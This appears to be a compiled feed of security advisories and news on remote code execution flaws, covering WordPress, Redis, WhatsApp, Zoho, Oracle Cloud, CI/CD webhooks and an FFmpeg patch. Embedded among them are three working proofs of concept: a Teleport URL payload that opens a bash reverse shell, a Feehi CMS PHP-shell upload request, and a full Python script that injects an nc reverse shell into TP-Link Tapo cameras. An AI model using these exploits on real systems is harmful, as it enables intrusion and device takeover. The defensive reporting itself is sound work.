The Image Hover Effects Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Title & Description values that can be added to an Image Hover in versions up to, and including, 9.7.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. By default, the plugin only allows administrators access to edit Image Hovers, however, if a site admin makes the plugin's features available to lower privileged users through the 'Who Can Edit?' setting then this can be exploited by those users.

CVE-2022-2937: Vulnerability Advisories - Wordfence

Teleport version 10.1.1 suffers from a remote code execution vulnerability.

    # Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE)# Date: 08/01/2022# Exploit Author: Brandon Roach & Brian Landrum# Vendor Homepage: https://goteleport.com# Software Link: https://github.com/gravitational/teleport# Version: < 10.1.2# Tested on: Linux# CVE: CVE-2022-36633Proof of Concept (payload):https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2=f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%3=0%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?=method=3DiamDecoded payload:"/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #

Teleport 10.1.1 Remote Code Execution

Feehi CMS version 2.1.1 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated)# Date: 22-08-2022# Exploit Author: yuyudhn# Vendor Homepage: https://feehi.com/# Software Link: https://github.com/liufee/cms# Version: 2.1.1 (REQUIRED)# Tested on: Linux, Docker# CVE : CVE-2022-34140# Proof of Concept:1. Login using admin account at http://feehi-cms.local/admin2. Go to Ad Management menu. http://feehi-cms.local/admin/index.php?r=ad%2Findex3. Create new Ad. http://feehi-cms.local/admin/index.php?r=ad%2Fcreate4. Upload php script with jpg/png extension, and using Burp suite or any tamper data browser add ons, change back the extension to php.5. Shell location: http://feehi-cms.local/uploads/setting/ad/[some_random_id].php# Burp request example:POST /admin/index.php?r=ad%2Fcreate HTTP/1.1Host: feehi-cms.localContent-Length: 1530Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://feehi-cms.localContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBYJ8wfp9LBoF4xgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://feehi-cms.local/admin/index.php?r=ad%2FcreateAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: _csrf=807bee7110e873c728188300428b64dd155c422c1ebf36205f7ac2047eef0982a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22H9zz-zoIIPm7GEDiUGwm81TqyoAb5w0U%22%3B%7D; PHPSESSID=aa1dec72025b1524ae0156d527007e53; BACKEND_FEEHICMS=7f608f099358c22d4766811704a93375; _csrf_backend=3584dfe50d9fe91cfeb348e08be22c1621928f41425a41360b70c13e7c6bd2daa%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22jQjzwf12TCyw_BLdszCqpz4zjphcQrmP%22%3B%7DConnection: close------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="_csrf_backend"FvaDqWC07mTGiOuZr-Qzyc2NlSACNuyPM4w7qXxTgmZ8p-nTF9LfVpLLku7wpn-tvvfWUXJM2PVZ_FPKLSHvNg==------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[name]"rce------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[tips]"rce at Ad management------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[input_type]"1------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[ad]"------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[ad]"; filename="asuka.php"Content-Type: image/png<?php phpinfo();------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[link]"--------------

Feehi CMS 2.1.1 Remote Code Execution

TP-Link Tapo c200 version 1.1.15 suffers from a remote code execution vulnerability.

    # Exploit Title: TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)# Date: 02/11/2022# Exploit Author: hacefresko# Vendor Homepage: https://www.tp-link.com/en/home-networking/cloud-camera/tapo-c200/# Version: 1.1.15 and below# Tested on: 1.1.11, 1.1.14 and 1.1.15# CVE : CVE-2021-4045# Write up of the vulnerability: https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rceimport requests, urllib3, sys, threading, osurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)PORT = 1337REVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f'NC_COMMAND = 'nc -lv %d' % PORT # nc command to receive reverse shell (change it depending on your nc version)if len(sys.argv) < 3:    print("Usage: python3 pwnTapo.py <victim_ip> <attacker_ip>")    exit()victim = sys.argv[1]attacker = sys.argv[2]print("[+] Listening on %d" % PORT)t = threading.Thread(target=os.system, args=(NC_COMMAND,))t.start()print("[+] Serving payload to %s\n" % victim)url = "https://" + victim + ":443/"json = {"method": "setLanguage", "params": {"payload": "';" + REVERSE_SHELL % (attacker, PORT) + ";'"}}requests.post(url, json=json, verify=False)

TP-Link Tapo c200 1.1.15 Remote Code Execution

Webhook, line, and sinker

Cloud-based source code management (SCM) platforms support integration with self-hosted CI/CD solutions through webhooks, which is great for DevOps automation.

However, the benefits can come with security trade-offs.

According to new findings from researchers at Cider, malicious actors can abuse webhooks to access internal resources, run remote code execution (RCE), and possibly obtain reverse shell access.

**Webhook IP ranges**

Software-as-a-service (SaaS) SCM systems provide an IP range for their webhooks. Organizations must open their networks to these IP ranges to enable integration between the SCM and their self-hosted CI/CD systems.

“We knew the combination of a SaaS source control management system and a self-managed CI with the webhook service IP range allowed towards the CI is a common architecture, and we wanted to check our possibilities there,” Omer Gil, head of research at Cider, told The Daily Swig.

Catch up on the latest DevSecOps news

Attackers can use webhooks to get past an organization’s firewalls. But SCM webhooks have strict limits, and there is very little room to make modifications to webhook requests.

However, the researchers discovered that with the right changes, they could get beyond the limited endpoints available to SCM webhooks.

**Accessing CI/CD endpoints**

On the CI/CD side, the researchers ran their experiments on Jenkins, an open-source DevOps server.

“We chose Jenkins since it’s self-hosted and commonly used, but \[our findings\] can be applied to any system that is accessible from the SCM, like artifact registries for example,” Gil said.

On the SCM side, they tested both GitHub and GitLab. While webhooks have been designed to trigger specific CI endpoints, they could modify requests to direct them to other endpoints that return user data or the console output of pipelines. Nevertheless, limits remain.

“Webhooks are sent as a POST request, which limits the options against the target service, since endpoints used to retrieve data usually only accept the GET parameter,” Gil said. “While it’s not possible to fire a GET request through GitHub, in GitLab it’s a different case, since if the POST request is responded with a redirection, the GitLab webhook service will follow it with sending the GET request.”

**Exploiting webhooks**

Using GitLab, the researchers were able to use webhooks to combine POST and GET requests to access internal resources. Interestingly, some Jenkins resources are accessible without authentication.

“By default, some resources can be accessed anonymously. Having said that, it’s not very common for an organization to leave it as is – but some do allow anonymous access,” Gil said.

In case authentication was required, the researchers found that they could direct webhooks to the login endpoint and conduct brute-force password attacks against the CI/CD platform. Once authenticated, they obtained a session cookie that could be used to access other resources.

If the Jenkins instance had a vulnerable plugin, the webhook mechanism could exploit it. In the proof-of-concept video above, the researchers show that they could force a vulnerable Jenkins server to download a malicious JAR file, run it on the server, and launch a reverse shell endpoint for the attacker.

This finding is a reminder of the risks created when CI/CD servers are partially open to the internet.

“A hermetic solution is to deny inbound traffic from the SCM webhook service, but it usually comes with engineering costs,” Gil said. “Some countermeasures can be taken, like setting a secure authentication mechanism in the CI, patching, and making sure all actions in the server are saved in the logs.”

RECOMMENDED ‘Security teams often fight against developers taking control’ of AppSec: Tanya Janca on the drive to DevSecOps adoption

CI/CD servers readily breached by abusing&nbsp; SCM webhooks, researchers find

A heap out-of-bounds memory write exists in FFMPEG since version 5.1. The size calculation in `build_open_gop_key_points()` goes through all entries in the loop and adds `sc->ctts_data[i].count` to `sc->sample_offsets_count`. This can lead to an integer overflow resulting in a small allocation with `av_calloc(). An attacker can cause remote code execution via a malicious mp4 file. We recommend upgrading past commit c953baa084607dd1d84c3bfcce3cf6a87c3e6e05

@@ -3967,8 +3967,11 @@ static int build\_open\_gop\_key\_points(AVStream \*st)

  

/\* Build an unrolled index of the samples \*/

sc->sample\_offsets\_count = 0;

for (uint32\_t i = 0; i < sc->ctts\_count; i++)

for (uint32\_t i = 0; i < sc->ctts\_count; i++) {

if (sc->ctts\_data\[i\].count > INT\_MAX - sc->sample\_offsets\_count)

return AVERROR(ENOMEM);

sc->sample\_offsets\_count += sc->ctts\_data\[i\].count;

}

av\_freep(&sc->sample\_offsets);

sc->sample\_offsets = av\_calloc(sc->sample\_offsets\_count, sizeof(\*sc->sample\_offsets));

if (!sc->sample\_offsets)

@@ -3987,8 +3990,11 @@ static int build\_open\_gop\_key\_points(AVStream \*st)

/\* Build a list of open-GOP key samples \*/

sc->open\_key\_samples\_count = 0;

for (uint32\_t i = 0; i < sc->sync\_group\_count; i++)

if (sc->sync\_group\[i\].index == cra\_index)

if (sc->sync\_group\[i\].index == cra\_index) {

if (sc->sync\_group\[i\].count > INT\_MAX - sc->open\_key\_samples\_count)

return AVERROR(ENOMEM);

sc->open\_key\_samples\_count += sc->sync\_group\[i\].count;

}

av\_freep(&sc->open\_key\_samples);

sc->open\_key\_samples = av\_calloc(sc->open\_key\_samples\_count, sizeof(\*sc->open\_key\_samples));

if (!sc->open\_key\_samples)

@@ -3999,6 +4005,8 @@ static int build\_open\_gop\_key\_points(AVStream \*st)

if (sg->index == cra\_index)

for (uint32\_t j = 0; j < sg->count; j++)

sc->open\_key\_samples\[k++\] = sample\_id;

if (sg->count > INT\_MAX - sample\_id)

return AVERROR\_PATCHWELCOME;

sample\_id += sg->count;

}

CVE-2022-2566: avformat/mov: Check count sums in build_open_gop_key_points() · FFmpeg/FFmpeg@c953baa

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a recently disclosed security flaw in Zoho ManageEngine to its Known Exploited Vulnerabilities (KEV) Catalog, citing evidence of active exploitation.
"Zoho ManageEngine PAM360, Password Manager Pro, and Access Manager Plus contain an unspecified vulnerability which allows for remote code execution," the agency

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a recently disclosed security flaw in Zoho ManageEngine to its Known Exploited Vulnerabilities (KEV) Catalog, citing evidence of active exploitation.

"Zoho ManageEngine PAM360, Password Manager Pro, and Access Manager Plus contain an unspecified vulnerability which allows for remote code execution," the agency said in a notice.

The critical vulnerability, tracked as CVE-2022-35405, is rated 9.8 out of 10 for severity on the CVSS scoring system, and was patched by Zoho as part of updates released on June 24, 2022.

Although the exact nature of the flaw remains unknown, the India-based enterprise solutions company said it addressed the issue by removing the vulnerable components that could lead to the remote execution of arbitrary code.

Zoho has also warned of the public availability of a proof-of-concept (PoC) exploit for the vulnerability, making it imperative that customers move quickly to upgrade the instances of Password Manager Pro, PAM360 and Access Manager Plus as soon as possible.

In light of active exploitation in the wild, Federal Civilian Executive Branch (FCEB) agencies are required to apply the vendor-provided patches by October 13, 2022.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

CISA Warns of Hackers Exploiting Recent Zoho ManageEngine Vulnerability

Vulnerability could have been used to bypass cloud isolation protection

Vulnerability could have been used to bypass cloud isolation protection

Oracle has patched a critical vulnerability in its cloud infrastructure that could have allowed attackers to steal data or tamper with client files.

On September 20, Wiz security researcher Elad Gabay publicly disclosed the security flaw, found in June following an examination of Oracle Cloud Infrastructure (OCI).

Dubbed #AttachMe, the “major” bug centers on one problem: a lack of permissions protection when attaching volumes to OCI.

**Attack path**

An attack would begin with the use of a target’s unique identifier, their cloud environment ID (OCID), which could be found via publicly available information or a low-privilege account.

A threat actor would then initiate an instance in an attacker-controlled tenant – located in the same availability domain (AD) as the target volume – before attaching the victim’s volume to the instance.

Read more of the latest cloud security news

OCI, by design, supports the attachment of a single volume to multiple instances simultaneously.

The lack of authorization checks would ensure the attacker had read/write privileges over the target volume, whether or not they had sufficient permissions.

As a result, it may have been possible for attackers to leverage this avenue to steal or modify information, search for cleartext secrets, or move laterally across the volume.

**Worst-case scenario**

In the worst-case scenario, attackers could potentially hijack an environment by manipulating binaries to achieve code execution.

“Before it was patched, #AttachMe could have allowed attackers to access and modify any other users’ OCI storage volumes without authorization, thereby violating cloud isolation,” Gabay said.

Wiz added that the vulnerability could have impacted all OCI customers or could have been used to target the infrastructure of individual client services.

The Wiz security team disclosed its findings to Oracle on June 9, three days after discovery.

Oracle acknowledged the security report on June 10, and it was on the same day that the vulnerability was confirmed and fixed. No OCI customer action is required.

Catch up with the latest cybersecurity vulnerability news

Speaking to The Daily Swig, Wiz researcher Sagi Tzadik said that the real-world ramifications of the vulnerability, if not patched so rapidly by oracle, could have been quite severe.

“This could lead to severe sensitive data leakage for potentially all OCI customers and in some scenarios could even be exploited to gain remote code execution on their environment, providing an initial entry point for further movement in the victim’s cloud environment,” he commented.

“While OCIDs are generally private, they are not treated as secrets. It is relatively feasible to obtain these IDs from a quick GitHub or Google search.”

Oracle declined to comment, but thanked Gabay in the firm’s July 2022 Critical Patch Update notes.

“Insufficient validation of user permissions is a common bug class among cloud service providers,” Wiz added.

“The best way to identify such issues is by performing rigorous code reviews and comprehensive tests for each sensitive API in the development stage. We also recommend performing service-specific penetration tests and participating in bug bounty programs, as these have proven effective with these types of issues.”

DON’T MISS Tarfile path traversal bug from 2007 still present in 350k open source repos

#AttachMe Oracle cloud bug exposed volumes to data theft, hijack 

Redis is an in-memory database that persists on disk. Versions 7.0.0 and above, prior to 7.0.5 are vulnerable to an Integer Overflow. Executing an `XAUTOCLAIM` command on a stream key in a specific state, with a specially crafted `COUNT` argument may cause an integer overflow, a subsequent heap overflow, and potentially lead to remote code execution. This has been patched in Redis version 7.0.5. No known workarounds exist.

**Impact**

Executing a XAUTOCLAIM command on a stream key in a specific state, with a specially crafted COUNT argument may cause an integer overflow, a subsequent heap overflow, and potentially lead to remote code execution. The problem affects Redis versions 7.0.0 or newer.

**Patches**

The problem is fixed in Redis version 7.0.5.

**Credits**

This problem was identified by Xion (SeungHyun Lee) of KAIST GoN.

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in the Redis repository
*   Email us at redis@redis.io

CVE-2022-35951: Heap overflow in Redis 7.0 XAUTOCLAIM command's COUNT argument.

An integer overflow in WhatsApp could result in remote code execution in an established video call.

**WhatsApp Security Advisories****2022 Updates**

**_February Update_**

**CVE-2021-24043**

A missing bound check in RTCP flag parsing code prior to WhatsApp for Android v2.21.23.2, WhatsApp Business for Android v2.21.23.2, WhatsApp for iOS v2.21.230.6, WhatsApp Business for iOS 2.21.230.7, and WhatsApp Desktop v2.2145.0 could have allowed an out-of-bounds heap read if a user sent a malformed RTCP packet during an established call.

**_January Update_**

**CVE-2021-24042**

The calling logic for WhatsApp for Android prior to v2.21.23, WhatsApp Business for Android prior to v2.21.23, WhatsApp for iOS prior to v2.21.230, WhatsApp Business for iOS prior to v2.21.230, WhatsApp for KaiOS prior to v2.2143, WhatsApp Desktop prior to v2.2146 could have allowed an out-of-bounds write if a user makes a 1:1 call to a malicious actor.

Tag

#rce